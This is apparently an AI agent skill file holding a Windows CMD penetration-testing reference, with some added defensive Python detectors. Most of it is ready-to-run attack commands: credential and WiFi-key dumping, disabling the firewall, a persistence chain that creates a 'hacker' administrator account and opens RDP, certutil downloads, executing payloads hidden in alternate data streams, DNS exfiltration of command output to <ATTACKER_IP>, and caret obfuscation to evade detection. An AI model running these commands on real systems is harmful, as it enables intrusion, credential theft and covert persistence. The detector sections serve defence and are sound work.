Hacktricks-skills windows-cmd-pentest

Windows Command Line reference for penetration testing and security assessment. Use this skill whenever the user needs Windows CMD commands for reconnaissance, enumeration, privilege escalation, persistence, or post-exploitation activities. Trigger on requests about Windows pentesting, CMD commands, AD enumeration, system info gathering, or Windows security assessment.

Install (from source): clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/windows-hardening/basic-cmd-for-pentesters/SKILL.MD
source content

Windows CMD Pentesting Reference

A comprehensive command reference for Windows penetration testing and security assessment using native CMD tools.

System Enumeration

Architecture and Version

wmic os get osarchitecture
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic computersystem LIST full

Patches and Updates

wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe list brief

Environment Variables

set

Key variables to check:

  • COMPUTERNAME - Computer name
  • TEMP/TMP - Temp folder location
  • USERNAME - Current username
  • USERPROFILE - Home directory
  • windir - Windows directory (C:\Windows)
  • LOGONSERVER - Domain controller name
  • USERDNSDOMAIN - DNS domain name
  • USERDOMAIN - Domain name

Disk and Storage

wmic logicaldisk get caption,description,providername
fsutil fsinfo drives

Processes and Services

tasklist /V
tasklist /SVC
net start
wmic service list brief
sc query

Scheduled Tasks

schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName

Installed Software

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Active Directory Enumeration

Domain Information

echo %USERDOMAIN%
echo %USERDNSDOMAIN%
echo %logonserver%
gpresult /V
wmic ntdomain list /format:list

User Enumeration

dsquery user
net user /domain
net user <ACCOUNT_NAME> /domain
wmic useraccount list /format:list
wmic sysaccount list /format:list

Group Enumeration

net group /domain
net localgroup administrators /domain
net group "Domain Admins" /domain
net group "domain computers" /domain
net group "Domain Controllers" /domain
wmic group list /format:list

Computer Enumeration

dsquery computer
net view /domain
nltest /dclist:<DOMAIN>

Trust Relationships

nltest /domain_trusts

Query Specific OU

dsquery * "CN=Users,DC=DOMAIN,DC=LOCAL"

User and Group Management

Current User Info

whoami /all
whoami /priv
net user %username%

Local Users

net users
dir /b /ad "C:\Users"
net accounts
wmic USERACCOUNT Get Domain,Name,Sid

Create User

net user [username] [password] /add

Domain User Creation

net user username password /ADD /DOMAIN

Add to Administrators

net localgroup Administrators [username] /add
net group "Domain Admins" username /ADD /DOMAIN

Add to Special Groups

net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

Check Logged-in Users

qwinsta
klist sessions

Run as Different User

runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe"
runas /savecred /user:WORKGROUP\Administrator "<command>"

Credential Discovery

Saved Credentials

cmdkey /list
vaultcmd /listcreds:"Windows Credentials" /all
rundll32 keymgr.dll, KRShowKeyMgr

Password Policy

net accounts
net accounts /domain

Network Reconnaissance

Network Configuration

ipconfig /all
route print
arp -a
netstat -ano
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"

Firewall

netsh firewall show state
netsh advfirewall firewall show rule name=all
netsh firewall show config
netsh advfirewall show allprofiles

Disable Firewall

netsh advfirewall set allprofiles state off
netsh firewall set opmode disable

Enable Firewall

netsh advfirewall set allprofiles state on

Open Ports

netsh advfirewall firewall add rule name="Rule Name" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="Rule Name" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

Enable Remote Desktop

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"

Enable Remote Desktop via WMIC

wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

Enable Remote Assistance

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

Network Shares

net view
net view /all /domain [domainname]
net view \\computer /ALL
net use x: \\computer\share
net share

WiFi Credentials

netsh wlan show profile
netsh wlan show profile <SSID> key=clear

SNMP Configuration

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

File Operations

Basic Commands

cd
cd C:\path\to\dir
dir
dir /a:h C:\path\to\dir
dir /s /b
time
date
type <file>

Hide/Unhide Files

attrib +h file
attrib -h file

File Permissions

icacls <FILE_PATH> /t /grant <USERNAME>:F   # Grant full control; /t recurses into subfolders (/e and /p are cacls switches, not icacls)
icacls <FILE_PATH> /remove <USERNAME>   # Remove the user's explicit ACE

Copy to SMB

xcopy /hievry C:\source\path \\10.10.14.13\share\path

Shutdown

shutdown /r /t 0

Download Techniques

BitsAdmin

bitsadmin /create <jobname>
bitsadmin /addfile <jobname> <url> <localpath>
bitsadmin /RESUME <jobname>
bitsadmin /complete <jobname>

CertUtil

certutil.exe -urlcache -split -f "http://<url>/file.exe" <localpath>.exe

CertReq

CertReq -Post -config <url> <localpath>

Alternate Data Streams (ADS)

Detect ADS

dir /r

Read ADS

more file.txt:ads.txt
powershell (Get-Content file.txt -Stream ads.txt)

Write to ADS

type C:\temp\evil.exe > "C:\path\logfile.log:evil.exe"
certutil.exe -urlcache -split -f <url> c:\temp:streamname

Extract from ADS

expand c:\ads\file.txt:test.exe c:\temp\evil.exe

Execute from ADS

wmic process call create "'C:\path\file.log:evil.exe'"
powershell -ep bypass - < c:\temp:streamname
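The `dir /r` listing above is the native way to spot streams, but on a busy share it is long and every file with a Zone.Identifier stream shows up. The following parser is an added example, not part of the original reference or the hacktricks-skills repository: it reads a saved `dir /r` listing, keeps only the `:$DATA` stream lines, and flags streams a defender would want to look at (anything other than Zone.Identifier, with extra weight for executable-looking stream names and large payloads). The sample listing, its dates, sizes and file names are constructed for the example; the line shape follows what `dir /r` prints.

```python
import re

# Constructed sample in the shape `dir /r` prints (dates, sizes, names invented).
# Stream lines carry no date/time column, only the size and file:stream:$DATA.
SAMPLE_DIR_R = r"""
 Volume in drive C has no label.
 Directory of C:\path

05/01/2024  10:00 AM    <DIR>          .
05/01/2024  10:00 AM    <DIR>          ..
05/01/2024  10:02 AM               845 logfile.log
                                 73,802 logfile.log:evil.exe:$DATA
05/01/2024  09:50 AM            12,400 report.docx
                                    26 report.docx:Zone.Identifier:$DATA
05/01/2024  09:55 AM                 5 notes.txt
                                    12 notes.txt:ads.txt:$DATA
"""

# size, then <file>:<stream>:$DATA; stream names cannot contain ':' '\' or '/'
ADS_LINE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")
EXPECTED_STREAMS = {"zone.identifier"}          # browsers/mail clients add this one legitimately
EXEC_SUFFIXES = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js")
LARGE_PAYLOAD_BYTES = 4096                      # Zone.Identifier streams are a few dozen bytes


def parse_ads(listing):
    """Return every alternate data stream in a dir /r listing as a dict."""
    streams = []
    for line in listing.splitlines():
        m = ADS_LINE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            streams.append({"file": m.group(2), "stream": m.group(3), "size": size})
    return streams


def suspicious_streams(listing):
    """Filter parsed streams down to the ones worth investigating, with reasons."""
    out = []
    for s in parse_ads(listing):
        if s["stream"].lower() in EXPECTED_STREAMS:
            continue
        reasons = ["unexpected stream name"]
        if s["stream"].lower().endswith(EXEC_SUFFIXES):
            reasons.append("executable extension")
        if s["size"] > LARGE_PAYLOAD_BYTES:
            reasons.append("large payload")
        out.append({**s, "reasons": reasons})
    return out


if __name__ == "__main__":
    for hit in suspicious_streams(SAMPLE_DIR_R):
        print(f"{hit['file']}:{hit['stream']} ({hit['size']} bytes): {', '.join(hit['reasons'])}")
```

Save a listing with `dir /r /s C:\share > streams.txt` and feed the file's text to `suspicious_streams`; the Zone.Identifier allowlist keeps ordinary downloaded files out of the result.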

DNS Exfiltration

Send Command Output via DNS

for /f %a in ('whoami') do nslookup %a <ATTACKER_IP>
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <ATTACKER_IP>
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <ATTACKER_IP>

Handle Spaces in Paths

for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <ATTACKER_IP>

Redirect and Exfiltrate

whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <ATTACKER_IP>
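Each of the loops above turns a command's output into DNS labels and sends them with `nslookup` straight to a chosen server, so two things are visible on the wire: queries that bypass the corporate resolvers, and query names whose labels look like command output rather than hostnames, arriving in a burst. The following detector is an added example, not part of the original reference or the hacktricks-skills repository. It runs over a constructed, flattened query log in a format invented for the example (`timestamp client resolver qname`); the resolver allowlist, burst threshold and the 198.51.100.7 address standing in for the attacker's server are assumptions to adapt to your environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed, flattened DNS query log: "timestamp client resolver qname".
# The 10.0.0.31 lines mirror the for /f loops above: whoami output, whoami /priv
# rows tokenised into labels, and dir /B output, all sent directly to an outside
# resolver (198.51.100.7 is a documentation address standing in for the server).
SAMPLE_LOG = r"""
2024-05-01T10:00:01 10.0.0.25 10.0.0.2 fileserver.corp.local
2024-05-01T10:00:02 10.0.0.25 10.0.0.2 www.microsoft.com
2024-05-01T10:05:10 10.0.0.31 198.51.100.7 corp\lab-analyst
2024-05-01T10:05:10 10.0.0.31 198.51.100.7 SeShutdownPrivilege.Shut.down
2024-05-01T10:05:11 10.0.0.31 198.51.100.7 SeChangeNotifyPrivilege.Bypass.traverse
2024-05-01T10:05:11 10.0.0.31 198.51.100.7 SeUndockPrivilege.Remove.computer
2024-05-01T10:05:12 10.0.0.31 198.51.100.7 Program.Files.(x86)
2024-05-01T10:06:00 10.0.0.40 10.0.0.2 mail.corp.local
"""

ALLOWED_RESOLVERS = {"10.0.0.2"}   # corporate DNS servers clients are expected to use
BURST_COUNT = 4                    # this many queries to one resolver ...
BURST_WINDOW_S = 10                # ... inside this many seconds is a burst

HOSTNAME_LABEL = re.compile(r"[A-Za-z0-9-]+")   # characters a normal DNS label uses
CAMEL_CASE = re.compile(r"[a-z][A-Z]")          # e.g. SeDebugPrivilege, rare in real hostnames


def parse_log(text):
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, resolver, qname = line.split(maxsplit=3)
        records.append({"ts": datetime.fromisoformat(ts), "client": client,
                        "resolver": resolver, "qname": qname})
    return records


def odd_labels(qname):
    """Labels that do not look like hostname components (bad characters or CamelCase)."""
    return [label for label in qname.split(".")
            if not HOSTNAME_LABEL.fullmatch(label) or CAMEL_CASE.search(label)]


def analyze(records, allowed=ALLOWED_RESOLVERS):
    """Return (per-query alerts, (client, resolver) pairs that queried in a burst)."""
    alerts, by_pair = [], defaultdict(list)
    for r in records:
        reasons = []
        if r["resolver"] not in allowed:
            reasons.append("resolver not in allowlist")
        odd = odd_labels(r["qname"])
        if odd:
            reasons.append("non-hostname labels: " + ",".join(odd))
        if reasons:
            alerts.append({"client": r["client"], "qname": r["qname"], "reasons": reasons})
        by_pair[(r["client"], r["resolver"])].append(r["ts"])
    bursts = []
    for pair, times in by_pair.items():
        times.sort()
        for i in range(len(times) - BURST_COUNT + 1):
            if (times[i + BURST_COUNT - 1] - times[i]).total_seconds() <= BURST_WINDOW_S:
                bursts.append(pair)
                break
    return alerts, bursts


if __name__ == "__main__":
    alerts, bursts = analyze(parse_log(SAMPLE_LOG))
    for a in alerts:
        print(a["client"], a["qname"], "->", "; ".join(a["reasons"]))
    print("burst pairs:", bursts)
```

The resolver check alone catches the reference's loops because `nslookup <name> <ATTACKER_IP>` talks to the named server directly; the label and burst checks cover the case where the attacker-controlled zone is reached through the corporate resolver instead.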

Bypass Techniques

Character Blacklisting

echo %HOMEPATH:~6,-11%   # Outputs backslash
who^ami   # Runs whoami; the caret breaks a literal "whoami" string match
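Both tricks above rely on cmd.exe's own parsing rules: `%VAR:~start,len%` is substring expansion of an environment variable (a negative start counts from the end, a negative length drops that many trailing characters), and `^` escapes the next character outside double quotes while being literal inside them. A command-line keyword match that ignores those rules misses `who^ami`. The normalizer below is an added example, not part of the original reference or the hacktricks-skills repository; it implements both rules so a detector can match process-creation command lines after normalization. The sample environment, the `\Users\Lab-Analyst` home path and the watchlist are constructed for the example.

```python
import re

# Constructed environment for the example; a real detector would use the
# values recorded for the host or the process.
SAMPLE_ENV = {"HOMEPATH": r"\Users\Lab-Analyst", "COMSPEC": r"C:\Windows\system32\cmd.exe"}

# Constructed watchlist of command fragments worth alerting on after normalization.
WATCHLIST = ("whoami", "net user", "net localgroup", "reg add", "nslookup")

_SUBSTR = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*):~(-?\d+)(?:,(-?\d+))?%")


def cmd_substring(value, start, length=None):
    """Apply cmd.exe %VAR:~start,length% semantics to an expanded value."""
    n = len(value)
    s = start if start >= 0 else max(n + start, 0)
    if length is None:
        return value[s:]
    e = s + length if length >= 0 else n + length
    return value[s:e] if e > s else ""


def expand_substrings(cmdline, env):
    """Resolve %VAR:~s,l% tokens; unknown variables stay as written so the
    analyst still sees them."""
    upper = {k.upper(): v for k, v in env.items()}

    def repl(m):
        name, start, length = m.group(1).upper(), int(m.group(2)), m.group(3)
        if name not in upper:
            return m.group(0)
        return cmd_substring(upper[name], start, None if length is None else int(length))

    return _SUBSTR.sub(repl, cmdline)


def strip_carets(cmdline):
    """Remove escape carets outside double quotes: ^x -> x, ^^ -> ^.
    Inside a quoted string the caret is literal and is kept."""
    out, in_quotes, i = [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes:
            if i + 1 < len(cmdline):      # a trailing caret escapes nothing
                out.append(cmdline[i + 1])
                i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def deobfuscate(cmdline, env=SAMPLE_ENV):
    """Expansion happens before caret handling in cmd.exe, so do it in that order,
    then case-fold and collapse whitespace for matching."""
    return " ".join(strip_carets(expand_substrings(cmdline, env)).lower().split())


def watchlist_hits(cmdline, env=SAMPLE_ENV):
    norm = deobfuscate(cmdline, env)
    return [w for w in WATCHLIST if w in norm]


if __name__ == "__main__":
    for line in ("who^ami", "echo %HOMEPATH:~6,-11%", 'echo "a^b" ^& n^et us^er'):
        print(repr(line), "->", repr(deobfuscate(line)), watchlist_hits(line))
```

Substring expansion needs the real variable values, which is why the function takes an environment: the same `%HOMEPATH:~6,-11%` yields a single backslash only for a home path of the length the attacker tested against, so a detector that only sees the command line should flag the `:~` syntax itself when the expansion cannot be resolved.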

Error Messages

net helpmsg <error_code>

URL ACLs

netsh http show urlacl

Persistence Quick Reference

Full Persistence Chain

# One command per line; cmd.exe has no backslash line continuation (the commands chain with & on one line, or run separately)
net user hacker Hacker123! /add
net localgroup administrators hacker /add
net localgroup "Remote Desktop Users" hacker /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
netsh firewall set service remoteadmin enable
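Every step of that chain leaves a Security log event on the host: 4720 for the account creation, 4732 for each local group addition, 4657 for the Terminal Server registry values (only when the key carries a SACL) and 4946 for the firewall rule. The correlation below is an added example, not part of the original reference or the hacktricks-skills repository: it ties those events together by host and account inside a short window, rating account creation plus a privileged group as high and adding RDP enablement as critical. The event records are constructed and simplified, with field names chosen for the example rather than taken from the raw Windows event schema; only the event IDs are real.

```python
from datetime import datetime, timedelta

# Constructed, simplified event records. Field names are this example's own;
# the event IDs are the real ones:
#   4720 user account created, 4732 member added to a security-enabled local group,
#   4657 registry value modified (needs a SACL on the key), 4946 firewall exception rule added.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T22:10:05", "id": 4720, "host": "WS01", "subject": "CORP\\svc-backup", "target": "hacker"},
    {"time": "2024-05-01T22:10:06", "id": 4732, "host": "WS01", "subject": "CORP\\svc-backup", "member": "hacker", "group": "Administrators"},
    {"time": "2024-05-01T22:10:06", "id": 4732, "host": "WS01", "subject": "CORP\\svc-backup", "member": "hacker", "group": "Remote Desktop Users"},
    {"time": "2024-05-01T22:10:07", "id": 4657, "host": "WS01", "subject": "CORP\\svc-backup",
     "object": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server", "value": "fDenyTSConnections", "new": "0"},
    {"time": "2024-05-01T22:10:08", "id": 4946, "host": "WS01", "subject": "CORP\\svc-backup", "rule": "Remote Desktop", "port": "3389"},
    # benign onboarding on another host: account created, added to Users only
    {"time": "2024-05-01T09:00:00", "id": 4720, "host": "WS02", "subject": "CORP\\helpdesk", "target": "j.doe"},
    {"time": "2024-05-01T09:00:01", "id": 4732, "host": "WS02", "subject": "CORP\\helpdesk", "member": "j.doe", "group": "Users"},
]

PRIV_GROUPS = {"administrators", "remote desktop users"}
RDP_VALUES = {"fdenytsconnections", "fallowtogethelp"}
WINDOW = timedelta(minutes=10)   # assumed window between account creation and follow-up steps


def _t(e):
    return datetime.fromisoformat(e["time"])


def correlate(events, window=WINDOW):
    """For every account creation, collect privileged-group additions for that
    account and RDP enablement on the same host inside the window after it."""
    evs = sorted(events, key=_t)
    findings = []
    for e in evs:
        if e["id"] != 4720:
            continue
        t0, acct, host = _t(e), e["target"].lower(), e["host"]
        groups, rdp = set(), []
        for f in evs:
            if f["host"] != host or not (timedelta(0) <= _t(f) - t0 <= window):
                continue
            if f["id"] == 4732 and f["member"].lower() == acct and f["group"].lower() in PRIV_GROUPS:
                groups.add(f["group"])
            elif f["id"] == 4657 and f["value"].lower() in RDP_VALUES:
                rdp.append(f["value"])
            elif f["id"] == 4946 and f["port"] == "3389":
                rdp.append("firewall:" + f["rule"])
        if groups:   # a plain account creation on its own is not a finding
            findings.append({
                "host": host, "account": e["target"], "created_by": e["subject"],
                "groups": sorted(groups), "rdp_changes": rdp,
                "severity": "critical" if rdp else "high",
            })
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']}: {f['created_by']} created {f['account']}, "
              f"groups={f['groups']}, rdp={f['rdp_changes']}")
```

The group check is the anchor deliberately: account creation alone is routine, but a fresh local account landing in Administrators or Remote Desktop Users within minutes is rare outside this pattern, and the registry and firewall events only raise the severity.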

Common Reconnaissance Patterns

Quick System Info

hostname & systeminfo | findstr /B /C:"OS Name" /C:"OS Version" & whoami /all

Quick Domain Info

echo %USERDOMAIN% & echo %logonserver% & net user /domain | findstr /v "------------"

Quick Network Info

ipconfig /all & netstat -ano | findstr LISTENING

Quick Privilege Check

whoami /priv | findstr /i "enable"

Tips

  1. Use 2>nul to suppress error messages when commands might fail
  2. Use findstr to filter output for specific keywords
  3. Use ^ to escape special characters in commands
  4. Use & to chain multiple commands on one line
  5. Use | to pipe output between commands
  6. Check LOLBAS (https://lolbas-project.github.io/) for more living-off-the-land binaries
  7. Use short paths (e.g., Progra~2) when dealing with spaces in paths
  8. Save output to files for later analysis: command > output.txt

When to Use This Skill

Use this skill when you need:

  • Windows CMD commands for penetration testing
  • Active Directory enumeration techniques
  • System reconnaissance on Windows targets
  • Privilege escalation command references
  • Persistence mechanism examples
  • Network share and credential discovery
  • File operation commands for Windows
  • Bypass techniques for restricted environments